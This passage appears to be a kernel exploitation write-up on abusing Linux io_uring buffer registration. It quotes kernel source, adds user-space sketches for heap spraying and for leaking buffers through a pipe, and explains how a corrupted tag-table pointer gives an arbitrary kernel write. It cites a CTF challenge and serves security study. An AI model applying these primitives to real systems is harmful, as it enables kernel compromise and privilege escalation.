    if (!nr_args || nr_args > IORING_MAX_REG_BUFFERS)
        return -EINVAL;
    ret = io_rsrc_node_switch_start(ctx);
    if (ret)
        return ret;
    ret = io_rsrc_data_alloc(ctx, io_rsrc_buf_put, tags, nr_args, &data);
    if (ret)
        return ret;
    ret = io_buffers_map_alloc(ctx, nr_args);
    if (ret) {
        io_rsrc_data_free(data);
        return ret;
    }

    for (i = 0; i < nr_args; i++, ctx->nr_user_bufs++) {
        if (arg) {
            ret = io_copy_iov(ctx, &iov, arg, i);
            if (ret)
                break;
            ret = io_buffer_validate(&iov);
            if (ret)
                break;
        } else {
            memset(&iov, 0, sizeof(iov));
        }

        if (!iov.iov_base && *io_get_tag_slot(data, i)) {
            ret = -EINVAL;
            break;
        }

        ret = io_sqe_buffer_register(ctx, &iov, &ctx->user_bufs[i],
                                     &last_hpage);
        if (ret)
            break;
    }

    WARN_ON_ONCE(ctx->buf_data);

    ctx->buf_data = data;
    if (ret)
        __io_sqe_buffers_unregister(ctx);
    else
        io_rsrc_node_switch(ctx, NULL);
    return ret;
}

__cold int io_register_rsrc(struct io_ring_ctx *ctx, void __user *arg,
                            unsigned int size, unsigned int type)
{
    struct io_uring_rsrc_register rr;

    /* keep it extendible */
    if (size != sizeof(rr))
        return -EINVAL;

    memset(&rr, 0, sizeof(rr));
    if (copy_from_user(&rr, arg, size))
        return -EFAULT;
    if (!rr.nr || rr.resv2)
        return -EINVAL;
    if (rr.flags & ~IORING_RSRC_REGISTER_SPARSE)
        return -EINVAL;

    switch (type) {
    case IORING_RSRC_FILE:
        if (rr.flags & IORING_RSRC_REGISTER_SPARSE && rr.data)
            break;
        return io_sqe_files_register(ctx, u64_to_user_ptr(rr.data),
                                     rr.nr, u64_to_user_ptr(rr.tags));
    case IORING_RSRC_BUFFER:
        if (rr.flags & IORING_RSRC_REGISTER_SPARSE && rr.data)
            break;
        return io_sqe_buffers_register(ctx, u64_to_user_ptr(rr.data), // the IORING_REGISTER_BUFFERS2 path
                                       rr.nr, u64_to_user_ptr(rr.tags));
    }
    return -EINVAL;
}
  • io_rsrc_data_alloc() allocates an io_rsrc_data struct: 80 bytes, GFP_KERNEL, served from kmalloc-96.
  • io_alloc_page_table() allocates the pointer array and, depending on the size passed in, a matching number of 4k kernel objects, all with GFP_KERNEL_ACCOUNT.

The size here is user-controlled, so we control both the pointer-array size and the number of 4k kernel objects allocated (a worked example follows the listing):

static __cold void **io_alloc_page_table(size_t size)
{
    unsigned i, nr_tables = DIV_ROUND_UP(size, PAGE_SIZE);
    size_t init_size = size;
    void **table;

    table = kcalloc(nr_tables, sizeof(*table), GFP_KERNEL_ACCOUNT);
    if (!table)
        return NULL;

    for (i = 0; i < nr_tables; i++) {
        unsigned int this_size = min_t(size_t, size, PAGE_SIZE);

        table[i] = kzalloc(this_size, GFP_KERNEL_ACCOUNT);
        if (!table[i]) {
            io_free_page_table(table, init_size);
            return NULL;
        }
        size -= this_size;
    }
    return table;
}
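Worked numbers for that arithmetic: each tag is a u64, so size = nr * 8 and every 512 tags fill one 4 KiB table:

/* size = nr_args * sizeof(u64); nr_tables = DIV_ROUND_UP(size, 4096)
 *
 *   nr_args = 512  -> size = 4096 -> 1 x kzalloc(4096)
 *   nr_args = 1024 -> size = 8192 -> 2 x kzalloc(4096)
 *   nr_args = 513  -> size = 4104 -> 1 x kzalloc(4096) + 1 x kzalloc(8)
 */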

After the allocations comes the data copy: the 4k kernel objects can be filled entirely with data from user space:

__cold static int io_rsrc_data_alloc(struct io_ring_ctx *ctx,
                                     rsrc_put_fn *do_put, u64 __user *utags,
                                     unsigned nr, struct io_rsrc_data **pdata)
{
    ...

    data->nr = nr;
    data->ctx = ctx;
    data->do_put = do_put;
    if (utags) {
        ret = -EFAULT;
        for (i = 0; i < nr; i++) {
            u64 *tag_slot = io_get_tag_slot(data, i);

            if (copy_from_user(tag_slot, &utags[i],
                               sizeof(*tag_slot)))
                goto fail;
        }
    }

    atomic_set(&data->refs, 1);
    init_completion(&data->done);
    *pdata = data;
    return 0;
fail:
    io_rsrc_data_free(data);
    return ret;
}

Note that io_sqe_buffers_register() produces extra allocation noise: the io_buffers_map_alloc(ctx, nr_args) call.

Once the 4k objects are allocated, we can also update their contents through the IORING_REGISTER_BUFFERS_UPDATE opcode, which eventually reaches __io_sqe_buffers_update() (a user-space invocation sketch follows the listing):

static int __io_sqe_buffers_update(struct io_ring_ctx *ctx,
                                   struct io_uring_rsrc_update2 *up,
                                   unsigned int nr_args)
{
    u64 __user *tags = u64_to_user_ptr(up->tags);
    struct iovec iov, __user *iovs = u64_to_user_ptr(up->data);
    struct page *last_hpage = NULL;
    bool needs_switch = false;
    __u32 done;
    int i, err;

    if (!ctx->buf_data)
        return -ENXIO;
    if (up->offset + nr_args > ctx->nr_user_bufs)
        return -EINVAL;

    for (done = 0; done < nr_args; done++) {
        struct io_mapped_ubuf *imu;
        int offset = up->offset + done;
        u64 tag = 0;

        err = io_copy_iov(ctx, &iov, iovs, done);
        if (err)
            break;
        if (tags && copy_from_user(&tag, &tags[done], sizeof(tag))) {
            err = -EFAULT;
            break;
        }
        err = io_buffer_validate(&iov);
        if (err)
            break;
        if (!iov.iov_base && tag) {
            err = -EINVAL;
            break;
        }
        err = io_sqe_buffer_register(ctx, &iov, &imu, &last_hpage);
        if (err)
            break;

        i = array_index_nospec(offset, ctx->nr_user_bufs);
        if (ctx->user_bufs[i] != ctx->dummy_ubuf) {
            err = io_queue_rsrc_removal(ctx->buf_data, i,
                                        ctx->rsrc_node, ctx->user_bufs[i]);
            if (unlikely(err)) {
                io_buffer_unmap(ctx, &imu);
                break;
            }
            ctx->user_bufs[i] = ctx->dummy_ubuf;
            needs_switch = true;
        }

        ctx->user_bufs[i] = imu;
        *io_get_tag_slot(ctx->buf_data, i) = tag;
    }

    if (needs_switch)
        io_rsrc_node_switch(ctx, ctx->buf_data);
    return done ? done : err;
}
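Reaching this path from user space again goes through io_uring_register(), this time with a struct io_uring_rsrc_update2. A rough sketch (off, nr_bufs, iovs and tags are caller-provided):

/* Replace previously registered buffers starting at slot `off`. */
struct io_uring_rsrc_update2 up;
memset(&up, 0, sizeof(up));
up.offset = off;                    /* first buffer slot to update */
up.data   = (__u64)(uintptr_t)iovs; /* replacement iovec array */
up.tags   = (__u64)(uintptr_t)tags; /* replacement tags, optional */
up.nr     = nr_bufs;

/* nr_args again carries the struct size for the kernel's check. */
syscall(__NR_io_uring_register, ring_fd,
        IORING_REGISTER_BUFFERS_UPDATE, &up, sizeof(up));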

Reading/writing

IORING_REGISTER_BUFFERS2 exists precisely to pre-register buffers with the kernel for io_uring's own use, so we can use io_uring itself to submit SQEs that copy data from a file into a buffer, or from a buffer back into a file.

In user space we can therefore use a pipe to read the contents of these 4k buffers out to user space, or to write pipe/file data into these kernel buffers (a sketch follows).
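A sketch of the leak direction, assuming get_sqe() and submit_and_wait() are small helpers around the ring (hypothetical names): write the contents of registered buffer idx into a pipe, then read the pipe normally.

/* Leak sketch: fixed buffer -> pipe -> user space. */
struct io_uring_sqe *sqe = get_sqe();         /* hypothetical helper */
memset(sqe, 0, sizeof(*sqe));
sqe->opcode    = IORING_OP_WRITE_FIXED;
sqe->fd        = pipe_fds[1];                 /* pipe write end */
sqe->addr      = (__u64)(uintptr_t)fixed_buf; /* inside the registered iovec */
sqe->len       = 4096;
sqe->buf_index = idx;                         /* which registered buffer */
sqe->user_data = 1;
submit_and_wait();                            /* hypothetical helper */
read(pipe_fds[0], out, 4096);                 /* data now in user space */

The write direction is symmetric with IORING_OP_READ_FIXED: read from the pipe into the registered buffer.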

Freeing

Where there is a register for allocation there is an unregister for freeing: the IORING_UNREGISTER_BUFFERS opcode releases the memory allocated earlier, eventually calling io_rsrc_data_free():

static void io_free_page_table(void **table, size_t size)
{
    unsigned i, nr_tables = DIV_ROUND_UP(size, PAGE_SIZE);

    for (i = 0; i < nr_tables; i++)
        kfree(table[i]);
    kfree(table);
}

static void io_rsrc_data_free(struct io_rsrc_data *data)
{
    size_t size = data->nr * sizeof(data->tags[0][0]);

    if (data->tags)
        io_free_page_table((void **)data->tags, size);
    kfree(data);
}

Data leakage

Kernel "heap" addresses

Since the pointer array stores raw pointers to kernel objects, and those objects are allocated with the generic GFP_KERNEL_ACCOUNT flag, leaking the array's contents directly discloses kernel heap addresses.

Arbitrary address write

If we can corrupt a pointer stored in the pointer array, the update feature turns into an arbitrary address write.

If we can corrupt those pointers repeatedly, we can even brute-force the heap base (workable because the write goes through copy_from_user(); see the sketch below).
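To see why a corrupted table pointer yields this primitive, recall how a tag slot is located (reconstructed from io_uring's rsrc helpers of that era; the constants assume 4096-byte pages):

#define IO_RSRC_TAG_TABLE_SHIFT 9  /* ilog2(PAGE_SIZE / sizeof(u64)) */
#define IO_RSRC_TAG_TABLE_MASK  ((1U << IO_RSRC_TAG_TABLE_SHIFT) - 1)

static inline u64 *io_get_tag_slot(struct io_rsrc_data *data, unsigned int idx)
{
    unsigned int table_idx = idx >> IO_RSRC_TAG_TABLE_SHIFT;
    unsigned int off = idx & IO_RSRC_TAG_TABLE_MASK;

    /* If data->tags[table_idx] has been corrupted, the subsequent
     * copy_from_user() into this slot becomes an attacker-controlled
     * 8-byte write at an arbitrary address. */
    return &data->tags[table_idx][off];
}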

Example challenge: RCTF2022-game

RCTF2022-game

References